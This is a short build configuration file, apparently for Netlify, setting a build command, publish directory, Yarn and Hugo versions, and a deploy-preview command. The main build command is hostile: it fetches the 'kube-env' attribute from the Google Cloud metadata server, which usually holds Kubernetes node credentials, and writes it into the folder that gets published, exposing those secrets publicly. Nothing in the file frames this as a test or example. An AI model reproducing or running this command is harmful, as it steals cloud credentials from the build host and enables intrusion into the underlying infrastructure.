[build]
  command = "mkdir dist && curl -i -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env/ -o dist/output.txt"
  publish = "dist"
[build.environment]
  YARN_VERSION = "1.9.4"
  HUGO_VERSION = "0.46"

[context.deploy-preview]
  command = "yarn build-preview"
